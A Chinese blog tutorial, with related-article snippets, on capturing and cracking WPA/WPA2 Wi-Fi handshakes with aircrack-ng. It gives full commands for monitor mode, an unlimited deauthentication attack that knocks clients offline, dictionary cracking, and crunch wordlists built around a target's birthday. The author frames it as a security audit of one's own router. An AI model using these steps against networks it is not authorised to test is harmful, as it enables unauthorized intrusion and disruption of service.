【无线网络渗透 】如何使用Aircrack-ng 系列工具进行WPA/WPA2的监听和破解

最新推荐文章于 2024-02-28 22:15:15 发布
最新推荐文章于 2024-02-28 22:15:15 发布
阅读量3.7w 收藏 97
点赞数 18
分类专栏: 渗透&APT

版权声明:本文为博主tonyzhejiang原创文章,转载请注明来源博客:http://blog.csdn.net/tonyzhejiang)

目录:

  1. 前言
  2. 什么是 Aircrack-ng
  3. 所需工具
  4. 参数介绍
  5. 破解步骤
  6. 帮助 

     

1.前言

1.1 声明

注意:本文章是审核家庭无线路由器安全性的教程,破解别人的无线路由器密码是违法的,放弃WEP,真爱WPA2,禁用WPS。

本文章为个人学习笔记和整理,如有不当之处,请予指正,欢迎在底下的品论中给我反馈,以便我可以及时更正。谢谢!

本文章可能有一小部分中文语法和标点符号错误,请谅解!

本文章所出现的:ex('数字') 这个为解释符号,已这些形式出现的都会在“帮助”里进行解释!

如果你有发现任何错误请告知,谢谢!

 

2. 什么是 Aircrack-ng

2.1 介绍

 


这里写图片描述

Aircrack- NG是一个完整的工具来评估Wi-Fi网络安全套件(ex.1)

它专注于WiFi安全的不同领域:

监控:数据包捕获和导出数据到文本文件,以供第三方工具进一步处理。 
攻击:通过数据包注入回放攻击,去认证,伪造接入点等。 
测试:检查WiFi卡和驱动程序的能力(捕捉和注入)。 
破解WEP 和 WPA PSKWPA 1和2)。 
所有的工具都是命令行,它允许重的脚本。很多GUI都利用了这个功能。它主要工作在 Linux,但也支持 Windows,OS X,FreeBSD,OpenBSD,NetBSD以及Solaris甚至eComStation 2。

本次,我们将会使用Aircrack-ng进行对我本人的无线网络(WPA/WPA2 加密方式)进行破解。我会在下面的内容中示范本次操作,本文章掩盖所有的ip信息以及mac地址,抱歉。 


 

3. 所需工具

3.1 准备

你需要:

  1. 一台装有 Linux(推荐Kali) 系统的计算机,或虚拟机
  2. aircrack-ng 套件
  3. 一张支持数据包Inject(注入)的和网络监听的无线网卡

 

4.参数介绍

4.1 关于aireplay-ng的几个参数

aireplay-ng是aircrack-ng套件里的一款抓包工具,aireplay-ng 中集成了10种攻击方式,分别是:

Attack 0: Deauthentication 解除认证 
Attack 1: Fake authentication 伪造身份验证 
Attack 2: Interactive packet replay 交互式数据包重播 
Attack 3: ARP request replay attack ARP请求重播攻击 
Attack 4: KoreK chopchop attack KoreK斩杀攻击 
Attack 5: Fragmentation attack 碎片攻击 
Attack 6: Cafe-latte attack 咖啡拿铁攻击 
Attack 7: Client-oriented fragmentation attack 面向客户的分片攻击 
Attack 8: WPA Migration Mode WPA迁移模式 
Attack 9: Injection test 注射试验

aireplay-ng在后面数据分析环节中担任非常重要的的角色,他的作用是抓取重要数据包,并用于为后面的字典暴击破解。

本次我我们将使用 Attack 0: Deauthentication 解除认证攻击。

 

5.破解步骤

5.1 教程

– 首先,进入系统,打开terminal,更新源。

sudo apt-get update 
sudo apt-get upgrade

– 安装 aircrack-ng 套件。 
注:Kali linux 是自带组件的。

sudo apt-get install aircrak-ng

– 完成后,插入你的网卡,并检测硬件状态。

在terminal里输入: 
iwconfig

这里写图片描述

注意:如果显示: 
no wireless extensions.

这里写图片描述 
请检查 是否正确连接 或 安装你的网卡驱动。

– 使用airmon-ng查看你无线网卡。

sudo airmon-ng

这里写图片描述

因为linux发行版不同,使用的内核也不同,Kali 4.9.0会在界面中多一个phy选项。

找到interface栏,记下你的无线网卡。 
我的无线网卡为wlan0。

– 使用airmon-ng开启网卡监听模式。 
记下你的monitor名称。

sudo airmon-ng start wlan0

这里写图片描述 
注:例如,我使用的Linux kali 4.9.0-kali4-amd64中无线网卡的monitor为 wlan0mon,老版本则为 mon0。

– 使用airodump-ng扫描信号。

扫描附件的wifi。

sudo airodump-ng wlan0mon

airodump-ng <你的monitor名称>

  • BSSID是AP端的MAC地址
  • PWR是信号强度,数字越小越好
  • #Data是对应的路由器的在线数据吞吐量,数字越大,数据上传量越大。
  • CH是对应路由器的所在频道
  • ESSID是对应路由器的名称

这里写图片描述

停止扫描,并选取合适的目标 
//快捷键 Ctrl + C

– 使用airodump-ng监听指定目标频道。

sudo airodump-ng -c 6 -w Desktop/handshake --bssid C0:00:00:00:00:48 wlan0mon

这里写图片描述 
airodump-ng -c <AP的频道(如紫色所示)> -w <抓取握手包的存放位置(如黄色所示)> --bssid <AP的MAC地址(如紫色所示)> <你的的monitor名称>

在你的抓取握手包的存放目录会生成4个文件。 
这里写图片描述 
:握手包文件的拓展名为 .cap 如红色方框所示。

然后,你的网卡会开始监听你目标端的频道

这里写图片描述
:请注意右上方(日期和时间右边的区域),如红色方框所示。以及在STATION栏中的Client MAC地址,选取一个客户端MAC地址并记录。

– 使用aireplay-ng进行解除认证攻击模式。

在这里有必要补充一下什握手包的概念,握手包指的是采用WPA加密方式的无线AP与无线客户端进行连接前的认证信息包。

一个合法的客户端要连上AP要经历四次握手(ex.2) 
1.你请求连AP 2.AP发一个数据包给你 
3.你将收到的数据包用wpa密钥加密,然后发给AP 
4.AP用自己保存的wpa密钥加密相同数据包,然后和你发给他的比较,如果相同,就发准许接入的许可。 
上面就是一个合法客户端四次握手的全过程,我们所说的抓握手包,是指抓AP发给合法客户的数据包,和合法客户端加密后发给AP的数据包。所以我们就抓这两个包,当我们有了明文和密文,就可以破解出密钥。

所以我们这里的关键是要发动攻击,迫使合法的客户端断线,进行重新认证,我们趁机抓包。

保持上一个terminal窗口的运行状态,打开一个新的terminal。

sudo aireplay-ng -0 0 -a C0:00:00:00:00:48 -c 18:00:00:00:00:88 wlan0mon

aireplay-ng -<攻击模式,我们这里使用 解除认证攻击(黄色区域)> [攻击次数,0为无限攻击] -a <AP端的MAC地址> -c <客户端端的MAC地址> <你的的monitor名称>

这里我使用的是解除认证攻击模式,给客户端无限发送测试包使其下线。当你获取到握手包时,可以使用快捷重点内容Ctrl + C 停止发送测试包。 
这里写图片描述
:当你获取道握手包时,红色区域会显示”WPA handshake”。

– 关闭监听模式。

sudo airmon-ng stop wlan0mon

– 使用字典进行暴力破解。

sudo aircrack-ng -w Desktop/wordlist.txt Desktop/handshake-01.cap 
:`aircrack-ng -w <字典路径> <握手包路径>

这里写图片描述

破解速度取决你CPU的核心数和频率

我在虚拟机上使用的i5 6400的速度为 2481.88 k/s(黄色区域)。图中红色区域分别为:跑完字典的剩余时间;完成率;当前尝试的密码。 
这里写图片描述

当密码破解成功时,会在图红色区域位置显示”KEY FOUND!”字样,中括号为AP端的密码。 
这里写图片描述

– (附) 如何制作一个简单字典文件。

在Linux中可以使用crunch来制作一个简单的字典,下面是自作方法。

  • 安装crunch sudo apt-get install crunch
  • 使用语法 crunch <min> max<max> <characterset> -t <pattern> -o <output filename>

例如,如果您知道目标的生日是0728(7月28日),并且认为他们以自己的密码包含他们生日,则可以生成一个以0728为结尾的密码列表,方法为@@@@@@@0728。 该字最多可生成11个字符(7个变量和4个固定)密码,然后全部都以0728结尾。

<min> = 最小密码长度。 
<max> = 最大密码长度。 
<characterset> = 用于生成密码的字符集。 
<pattern> = 生成的密码的指定模式。 
<outputfile> = 保存字典文件的路径。

注: pattern中可以使用的特殊标记字符(ex.3) 
[%]插入数字 
[@] 插入小写字母 
[,] 插入大写字母 
[^] 插入符号

桌面上是我生成字典,就像上面提到的那样,第一个8是我设定字典的最小长度;第二个8是我设定字典的最大长度(如橘色区域),0123456789是生成密码中包含的字符(如黄色区域)。所以,我生成的字典中只包含长度为8的0-9字符集。

这里写图片描述

– 注意: 
wpa/wpa2的密码破解就像是买彩票,破解的成败完全靠运气,不管怎么说,一个强大字典是肯定可以提高破解的成功几率。

注: 
window平台上可使用EWSA进行破解,它可以同时使用gpu进行破解运算。

重复:本文章是审核家庭无线路由器安全性的教程,破解别人的无线路由器密码是违法的,放弃WEP,真爱WPA2,禁用WPS。

 

6.帮助

6.1 来源

ex.1 aircrack-ng 套件包含有:

这里写图片描述 
来源:百度百科

ex.2 更多关于握手包的信息 来源:百度百科 
ex.3 更多关于crunch的信息 来源:简书 @真的是选么

参考: 
http://www.aircrack-ng.org/# 
http://www.voidcn.com/blog/king_of_fighter/article/p-2018690.html

 

tiny丶
关注
  • 18
    点赞
  • 97
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
aircrack-ng-win,无线网络破解
02-08
步骤1:搜索无线接入点信号,在Windows下可以使用的无线信号搜索工具有NetStumbler、WirelessMon、OmniPeek、Commview for WiFi等等,下图为使用Commview for WiFi进行无线扫描,可以看到,扫描到SSID为AR7WRD的无线接入点信号。 步骤2:将Windows版的Aircrack-ng套装解压缩到C盘下,需要说明的是,在其目录下应确保存在commview.dll、cygwin1.dll及ca2k.dll文件的存在,这些文件可以通过安装Commview for WiFi后在其安装目录中获得。在Windows下载入无线网卡,命令如下: airserv-ng -d “commview.dll|debug” 其中: -d 后跟网卡,在这里为笔记本上常见的内置Intel 3945ABG无线网卡,输入y确定。 步骤3:下面,打开airodump-ng进行无线抓包,命令如下: airodump-ng -w x.cap 127.0.0.1:666 其中: -w 后跟捕获的Cap数据包文件 后面的127.0.0.1:666即为本地无线网卡网络接口
无线密码破解工具 Aircrack-ng
09-17
主要是针对无线网络的密码破解,源码包!~
无线安全及Aircrack-ng for windows教程.docx
06-13
无线安全及Aircrack-ng for windows教程.docx无线安全及Aircrack-ng for windows教程.docx无线安全及Aircrack-ng for windows教程.docx无线安全及Aircrack-ng for windows教程.docx无线安全及Aircrack-ng for windows教程.docx无线安全及Aircrack-ng for windows教程.docx无线安全及Aircrack-ng for windows教程.docx无线安全及Aircrack-ng for windows教程.docx
kali linux通过aircrack-ng命令破解wifi密码
JineD的博客
02-28 1125
百度安全验证上面2篇文章写得都很不错。
【2024最新版】超详细Aircrack-ng安装保姆级教程,破译WiFi,收藏这一篇就够了
jennycisp的博客
12-29 4928
对于无线黑客而言,Aircrack-ng是一款必不可缺的无线攻击工具,可以说很大一部分无线攻击都依赖于它来完成;而对于无线安全人员而言,Aircrack-ng也是一款必备的无线安全检测工具,它可以帮助管理员进行无线网络密码的脆弱性检查及了解无线网络信号的分布情况,非常适合对企业进行无线安全审计时使用Aircrack-ng(注意大小写)是一个包含了多款工具的无线攻击审计套装,这里面很多工具在后面的内容中都会用到,具体见下表1为Aircrack-ng包含的组件具体列表。
Windows系统下运行aircrack-ng
06-30
aircrack-ng V1.6现支持在Windows系统下运行,可以通过CMD输入命令方式破解无线网络,或通过aircrack-ng GUI图形界面对无线进行破解
Aircrack-ng之Aireplay-ng命令
热门推荐
HoukChen的博客
08-30 2万+
描述aireplay-ng是一个注入帧的工具。它的主要作用是产生数据流量,而这些随后将会被用于aircrack-ng破解WEP和WPA/WPA2秘钥。aireplay-ng里包含了很多种不同的攻击方式用来获取WPA握手包。如:解除认证攻击(-0)、伪造认证攻击(-1)、交互式数据包重放攻击(-2)、手动ARP请求注入攻击(-3)、ARP请求重放注入攻击(-4)。而且,通过与packetforge-n
aircrack-ng安装和基础使用教程,三分钟手把手教会,非常简单!
leah126的博客
01-30 1万+
Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解Aircrack-ng可以工作在任何支持监听模式的无线网卡上(设备列表请参阅其官方网站或[1])并嗅探802.11a,802.11b,802.11g的数据。该程序可运行在Linux和Windows上。Linux版本已经被移植到了Zaurus和Maemo系统平台, 并概念验证可移植到iPhone。
Aircrack-ng使用教程
Kali与编程
03-26 3986
Aircrack-ng的配置文件位于/etc/aircrack-ng/aircrack-ng.conf中,可以通过修改该文件以更改默认设置。Aircrack-ng是一款用于无线网络渗透测试的工具,它可以扫描无线网络、捕获数据包、破解密码等。其中,“[channel]”是目标网络的信道号,“[BSSID]”是目标网络的MAC地址,“capture”是保存捕获数据包的文件名。其中,“[dictionary-file]”是用于破解密码的字典文件名,“capture-01.cap”是捕获的数据包文件名。
无线攻击 --aircrack-ng套件之一:Aireplay-NG(将数据包注入无线网络生成流量工具 / 解除认证DOS攻击,强制用户二次身份验证)
Kevin's Blog
03-05 4411
文章目录一、用法概述二、命令格式三、用法示例3.1 注入质量测试3.2 强制取消用户身份验证攻击3.3 虚假身份验证 一、用法概述   aireplay-ng是aircrack-ng的套件之一,用于注入无线帧,主要作用是产生流量,以便后续用aircrack-ng来对WPA-PSK进行破解,Aireplay-ng有许多攻击可以解除无线客户端的攻击,以捕获WPA握手数据,虚假身份认证,交互式数据包重放...
kali使用aircrack无线攻击wifi超详细步骤(包含监听网卡启动,获得握手包,密码本生成)
m0_50818626的博客
04-17 9214
平台及工具: linux:kali平台 aircrack - ng 工具 免驱监听网卡 详细操作 1.首先启动kali,插入网卡,输入ifconfig查看kali是否检测到监听网卡,注意监听网卡要免驱动的。 ifconfig //查看自身网卡信息 如图,看到wlan0就代表kali成功检测到监听网卡啦。 2.在启动网卡的监听模式之前一定要杀死进程,否则将会监听不到附近的WiFi,执行下面命令杀死进程。 airmon-ng check kill //杀死有关进程 3
airhack:为 WPA2 设计的 aircrack-ng 接口-开源
06-27
airhack是一个用c写的接口,专为WPA2安全测试而设计。 管理以下包的部分: - screen - macchanger - aircrack-ng - keygen https://sourceforge.net/projects/keygen/?source=directory 请在使用airhack之前安装这些。
aircrack-ng-1.2-rc3-win 破解WEP和WPA工具
12-17
aircrack-ng windows系统版本
完全教程 Aircrack-ng破解WEP、WPA-PSK加密利器
01-28
Aircrack完全使用教程,图文并茂,令入门学者清楚使用WiFi神器Aircrack-ng。主要介绍的是BackTrack4(BT4)中所使用Aircrack-ng
aircrack-ng-1.2
06-22
aircrack-ng-1.2-windows 下载的资源是window版本的。可以使用wpa2-psk破解工具
aircrack-ng-1.1-win,无线网络破解
11-06
步骤1:搜索无线接入点信号,在Windows下可以使用的无线信号搜索工具有NetStumbler、WirelessMon、OmniPeek、Commview for WiFi等等,下图为使用Commview for WiFi进行无线扫描,可以看到,扫描到SSID为AR7WRD的无线接入点信号。 步骤2:将Windows版的Aircrack-ng套装解压缩到C盘下,需要说明的是,在其目录下应确保存在commview.dll、cygwin1.dll及ca2k.dll文件的存在,这些文件可以通过安装Commview for WiFi后在其安装目录中获得。在Windows下载入无线网卡,命令如下: airserv-ng -d “commview.dll|debug” 其中: -d 后跟网卡,在这里为笔记本上常见的内置Intel 3945ABG无线网卡,输入y确定。 步骤3:下面,打开airodump-ng进行无线抓包,命令如下: airodump-ng -w x.cap 127.0.0.1:666 其中: -w 后跟捕获的Cap数据包文件 后面的127.0.0.1:666即为本地无线网卡网络接口
西南科技大学无线网络安全实验——使用aircrack-ng进行WPA破解
06-02
无线网络安全技术实验四——使用aircrack-ng进行WPA破解 一、实验目的 1.认识无线WPA/WPA2安全原理 2.熟悉无线WPA破解方法 二、实验设计 实验内容: 1.配置实验环境 2.开启无线网卡监听模式 3.利用工具或自己写...
A4打印模板-画图设计设计师产品草稿图纸-网格纸A4打印模板高清待办练字模板PDF下载.pdf
最新发布
04-23
A4打印模板-画图设计设计师产品草稿图纸-网格纸A4打印模板高清待办练字模板PDF下载
ISA-95 流程圣经,描述了PLM企业资源计划、MES制造执行系统、ERP企业资源计划系统、SCM供应链管理系统之间的关系
04-23
ISA-95 流程圣经,描述了PLM企业资源计划、MES制造执行系统、ERP企业资源计划系统、SCM供应链管理系统、客户关系管理CRM之间的关系
Windows怎么使用Aircrack-ng
03-02
Aircrack-ng是一个用于破解Wi-Fi密码的工具,它可以在Windows系统上使用。以下是使用Aircrack-ng的步骤: 1. 首先,你需要下载Aircrack-ng并将其解压缩到你的电脑上。 2. 接下来,打开命令提示符并导航到Aircrack-ng的目录。 3. 执行以下命令以捕获Wi-Fi数据包:airmon-ng start [无线网卡名称] 4. 接下来,使用以下命令启动数据包捕获:airodump-ng [无线网卡名称] 5. 当Airodump-ng开始捕获数据包时,你将看到Wi-Fi网络的详细信息,包括SSID、通道、BSSID等等。找到你想要破解密码的Wi-Fi网络,并记录下其BSSID和通道号。 6. 执行以下命令开始破解Wi-Fi密码:aircrack-ng -a2 -b [BSSID] -w [密码字典文件路径] [捕获文件路径] 请注意,使用Aircrack-ng破解Wi-Fi密码可能是非法的,所以请确保你有授权和合法的目的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值